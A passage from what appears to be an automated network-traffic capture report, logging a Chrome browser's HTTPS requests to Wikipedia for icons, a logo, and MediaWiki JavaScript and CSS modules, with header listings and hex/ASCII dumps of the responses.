                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/401946
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 704
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC704INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 3c 74 69 74 6c 65 3e 0a 09 09 6c 61 6e 67 75 61 67 65 0a 09 3c 2f 74 69 74 6c 65 3e 3c 67 20 66 69 6c 6c 3d 22 23 33 36 63 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 30 20 31 38 68 2d 31 2e 34 34 61 2e 36 2e 36 20 30 20 30 20 31 2d 2e 34 2d 2e 31 32 2e 38 2e 38 20 30 20 30 20 31 2d 2e 32 33 2d 2e 33 31 4c 31 37 20 31 35 68 2d 35 6c 2d 31 20 32 2e 35 34 61 2e 38 2e 38 20 30 20 30 20 31 2d 2e 32 32 2e
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>language</title><g fill="#36c"><path d="M20 18h-1.44a.6.6 0 0 1-.4-.12.8.8 0 0 1-.23-.31L17 15h-5l-1 2.54a.8.8 0 0 1-.22.


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      63192.168.2.1649789185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC585OUTGET /w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC927INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 21:39:37 GMT
                                                                                                                                                                                                                                      cache-control: public, s-maxage=31536000, max-age=31536000, immutable
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      last-modified: Tue, 17 Dec 2024 04:01:36 GMT
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 72796
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/776967
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 298
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC298INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 0a 09 3c 74 69 74 6c 65 3e 0a 09 09 65 78 74 65 72 6e 61 6c 20 6c 69 6e 6b 0a 09 3c 2f 74 69 74 6c 65 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 33 36 63 22 20 64 3d 22 4d 36 20 31 68 35 76 35 4c 38 2e 38 36 20 33 2e 38 35 20 34 2e 37 20 38 20 34 20 37 2e 33 6c 34 2e 31 35 2d 34 2e 31 36 7a 4d 32 20 33 68 32 76 31 48 32 76 36 68 36 56 38 68 31 76 32 61 31 20 31 20 30 20 30 20 31 2d 31 20 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>external link</title><path fill="#36c" d="M6 1h5v5L8.86 3.85 4.7 8 4 7.3l4.15-4.16zM2 3h2v1H2v6h6V8h1v2a1 1 0 0 1-1 1


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      64192.168.2.1649793185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC585OUTGET /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1058INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 11:59:53 GMT
                                                                                                                                                                                                                                      etag: W/"12u7u"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 12:22:01 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&sourcemap=1&version=12u7u
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/108799
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 22854
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC13737INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 67 61 64 67 65 74 2e 52 65 66 65 72 65 6e 63 65 54 6f 6f 6c 74 69 70 73 40 31 66 63 65 62 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 52 45 46 5f 4c 49 4e 4b 5f 53 45 4c 45 43 54 4f 52 3d 77 69 6e 64 6f 77 2e 72 74 5f 52 45 46 5f 4c 49 4e 4b 5f 53 45 4c 45 43 54 4f 52 7c 7c 27 2e 72 65 66 65 72 65 6e 63 65 2c 20 61 5b 68 72 65 66 5e 3d 22 23 43 49 54 45 52 45 46 22 5d 27 2c 43 4f 4d 4d 45 4e 54 45 44 5f 54 45 58 54 5f 43 4c 41 53 53 3d 77 69 6e 64 6f 77 2e 72 74 5f 43 4f 4d 4d 45 4e 54 45 44 5f 54 45 58 54 5f 43 4c 41 53 53 7c 7c 27
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.gadget.ReferenceTooltips@1fceb",function($,jQuery,require,module){(function(){var REF_LINK_SELECTOR=window.rt_REF_LINK_SELECTOR||'.reference, a[href^="#CITEREF"]',COMMENTED_TEXT_CLASS=window.rt_COMMENTED_TEXT_CLASS||'
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC9117INData Raw: 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 49 4e 5f 44 4f 57 4e 29 2e 61 64 64 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 4f 55 54 5f 55 50 29 3b 7d 65 6c 73 65 7b 74 6f 6f 6c 74 69 70 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 49 4e 5f 55 50 29 2e 61 64 64 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 4f 55 54 5f 44 4f 57 4e 29 3b 7d 74 6f 6f 6c 74 69 70 2e 74 65 2e 72 65 6d 6f 76 65 54 69 6d 65 72 3d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 6f 6f 6c 74 69 70 2e 69 73 50 72 65 73 65 6e 74 29 7b 74 6f 6f 6c 74 69 70 2e 24 65 6c 65 6d 65 6e 74 2e 64 65 74 61 63 68 28 29 3b 74 6f 6f
                                                                                                                                                                                                                                      Data Ascii: ement.removeClass(CLASSES.FADE_IN_DOWN).addClass(CLASSES.FADE_OUT_UP);}else{tooltip.$element.removeClass(CLASSES.FADE_IN_UP).addClass(CLASSES.FADE_OUT_DOWN);}tooltip.te.removeTimer=setTimeout(function(){if(tooltip.isPresent){tooltip.$element.detach();too


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      65192.168.2.1649794185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC733OUTGET /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1mjy2 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC1206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 09:04:12 GMT
                                                                                                                                                                                                                                      etag: W/"1mjy2"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 10:13:06 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&sourcemap=1&version=1mjy2
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/186630
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 59552
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC13587INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 76 69 73 75 61 6c 45 64 69 74 6f 72 2e 63 6f 72 65 2e 75 74 69 6c 73 2e 70 61 72 73 69 6e 67 40 31 72 63 72 6f 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 76 65 2e 69 73 42 6c 6f 63 6b 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 7b 63 6f 6e 73 74 20 65 6c 65 6d 65 6e 74 4e 61 6d 65 3d 74 79 70 65 6f 66 20 65 6c 65 6d 65 6e 74 3d 3d 3d 27 73 74 72 69 6e 67 27 3f 65 6c 65 6d 65 6e 74 3a 65 6c 65 6d 65 6e 74 2e 6e 6f 64 65 4e 61 6d 65 3b 72 65 74 75 72 6e 20 76 65 2e 65 6c 65 6d 65 6e 74 54 79 70 65 73 2e 62 6c 6f 63 6b 2e 69 6e 64 65 78 4f 66 28 65 6c
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.visualEditor.core.utils.parsing@1rcro",function($,jQuery,require,module){ve.isBlockElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.block.indexOf(el
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC16320INData Raw: 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 3d 6e 75 6c 6c 3b 24 28 0a 27 23 66 69 72 73 74 48 65 61 64 69 6e 67 2c 20 23 6d 77 2d 63 6f 6e 74 65 6e 74 2d 74 65 78 74 20 2e 6d 77 2d 65 64 69 74 73 65 63 74 69 6f 6e 27 29 2e 65 61 63 68 28 28 69 2c 65 6c 29 3d 3e 7b 63 6f 6e 73 74 20 74 6f 70 3d 65 6c 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 74 6f 70 3b 69 66 28 74 6f 70 3e 30 29 7b 66 69 72 73 74 56 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 3d 65 6c 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 7d 29 3b 69 66 28 66 69 72 73 74 56 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 26 26 66 69 72 73 74 56 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 2e 69 64 21 3d 3d 27 66 69 72 73 74 48 65 61 64 69 6e
                                                                                                                                                                                                                                      Data Ascii: isibleEditSection=null;$('#firstHeading, #mw-content-text .mw-editsection').each((i,el)=>{const top=el.getBoundingClientRect().top;if(top>0){firstVisibleEditSection=el;return false;}});if(firstVisibleEditSection&&firstVisibleEditSection.id!=='firstHeadin
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC2861INData Raw: 61 6c 6f 67 28 29 3b 7d 29 3b 7d 69 66 28 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 68 61 73 28 27 76 65 6e 6f 74 69 66 79 27 29 29 7b 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 27 76 65 6e 6f 74 69 66 79 27 29 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 27 27 2c 75 72 6c 29 3b 7d 7d 29 3b 7d 28 29 29 3b 0a 7d 2c 22 6d 6f 64 75 6c 65 73 2f 76 65 2d 6d 77 2f 70 72 65 69 6e 69 74 2f 64 61 74 61 2e 6a 73 6f 6e 22 3a 7b 22 75 6e 73 75 70 70 6f 72 74 65 64 45 64 69 74 50 61 72 61 6d 73 22 3a 5b 22 75 6e 64 6f 22 2c 22 75 6e 64 6f 61 66 74 65 72 22 2c 22 70 72 65 76 69 65 77 22 2c 22 76 65 73 77 69 74 63 68 65 64 22 5d 7d 7d 7d 2c 7b 22 63 73 73 22 3a 5b 22 2e 76 65 2d 61 63 74 69 76 65
                                                                                                                                                                                                                                      Data Ascii: alog();});}if(url.searchParams.has('venotify')){url.searchParams.delete('venotify');history.replaceState(null,'',url);}});}());},"modules/ve-mw/preinit/data.json":{"unsupportedEditParams":["undo","undoafter","preview","veswitched"]}}},{"css":[".ve-active
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC16320INData Raw: 61 74 65 64 20 2e 76 65 63 74 6f 72 2d 74 6f 63 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65 73 6b 74 6f 70 41 72 74 69 63 6c 65 54 61 72 67 65 74 2d 74 6f 6f 6c 62 61 72 2c 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65 73 6b 74 6f 70 41 72 74 69 63 6c 65 54 61 72 67 65 74 2d 74 6f 6f 6c 62 61 72 50 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 76 65 2d 75 69 2d 6f 76 65 72 6c 61 79 2d 6c 6f 63 61 6c 2c 2e 76 65 2d 75 69 2d 6f 76 65 72 6c 61 79 2d 67 6c 6f 62 61 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 65 6d 7d 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65 73 6b 74 6f 70 41 72 74 69 63 6c 65 54 61 72 67 65 74 2d 74 6f 6f 6c 62 61 72 50 6c 61 63 65 68 6f 6c 64 65 72 2d 62 61 72 2c 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65
                                                                                                                                                                                                                                      Data Ascii: ated .vector-toc{display:none}.ve-init-mw-desktopArticleTarget-toolbar,.ve-init-mw-desktopArticleTarget-toolbarPlaceholder,.ve-ui-overlay-local,.ve-ui-overlay-global{font-size:0.875rem}.ve-init-mw-desktopArticleTarget-toolbarPlaceholder-bar,.ve-init-mw-de
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC10464INData Raw: 74 61 72 74 29 3b 69 66 28 72 65 73 70 6f 6e 73 65 2e 76 69 73 75 61 6c 65 64 69 74 6f 72 29 7b 72 65 73 70 6f 6e 73 65 2e 76 69 73 75 61 6c 65 64 69 74 6f 72 2e 73 77 69 74 63 68 65 64 3d 73 77 69 74 63 68 65 64 3b 72 65 73 70 6f 6e 73 65 2e 76 69 73 75 61 6c 65 64 69 74 6f 72 2e 66 72 6f 6d 45 64 69 74 65 64 53 74 61 74 65 3d 66 72 6f 6d 45 64 69 74 65 64 53 74 61 74 65 3b 7d 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 3b 7d 29 3b 7d 6c 65 74 20 64 61 74 61 50 72 6f 6d 69 73 65 2c 61 62 6f 72 74 3b 69 66 28 75 73 65 52 65 73 74 62 61 73 65 29 7b 76 65 2e 74 72 61 63 6b 28 27 74 72 61 63 65 2e 72 65 73 74 62 61 73 65 4c 6f 61 64 2e 65 6e 74 65 72 27 2c 7b 6d 6f 64 65 3a 27 76 69 73 75 61 6c 27 7d 29 3b 63 6f 6e 73 74 20 68 65 61 64 65 72 73 3d 7b 41 63
                                                                                                                                                                                                                                      Data Ascii: tart);if(response.visualeditor){response.visualeditor.switched=switched;response.visualeditor.fromEditedState=fromEditedState;}return response;});}let dataPromise,abort;if(useRestbase){ve.track('trace.restbaseLoad.enter',{mode:'visual'});const headers={Ac


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      66192.168.2.1649795185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC787OUTGET /static/images/project-logos/enwiki.png HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC898INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 23:28:09 GMT
                                                                                                                                                                                                                                      etag: "1f0f-62309f0dda7c0"
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 23:28:09 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      content-length: 7951
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      age: 66284
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/175998
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC7951INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 87 00 00 00 9b 08 03 00 00 00 7f 2d 78 d8 00 00 02 fd 50 4c 54 45 47 70 4c cc cd cd be bf c0 94 96 96 00 00 00 a6 a8 aa 57 57 57 cf cf d0 d6 d7 d8 ac ac ae a2 a3 a5 b7 b8 b9 e0 e0 e0 c8 c8 c8 9c 9e a0 53 53 53 b2 b4 b6 b5 b6 b8 98 98 98 d7 d6 d7 00 00 00 d4 d5 d5 ce ce d0 bc bd bf ca c9 ca 3c 3c 3f b7 b7 b8 a6 a6 a7 a9 aa ac 80 82 87 e3 e3 e3 00 00 00 b7 b8 ba 9b 9c 9e 85 87 89 00 00 00 c1 c1 c3 00 00 00 8e 8e 8f 54 52 54 58 56 57 a1 a2 a5 e1 e1 e2 d9 d9 da e1 e1 e2 df df e0 61 60 61 a1 a2 a4 e4 e4 e5 e6 e5 e6 94 95 97 e4 e4 e5 9b 9b 9d d3 d3 d3 d8 d8 d9 90 92 94 89 8b 8d 5e 5e 5e ab ac af 82 84 87 ae af af 6f 6f 70 89 8a 8c 85 87 89 6e 6e 6f 78 79 7a 7b 7b 7b da da da 8a 8c 8e 54 54 54 57 57 58 c0
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR-xPLTEGpLWWWSSS<<?TRTXVWa`a^^^oopnnoxyz{{{TTTWWX


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      67192.168.2.1649797185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC822OUTGET /static/favicon/wikipedia.ico HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
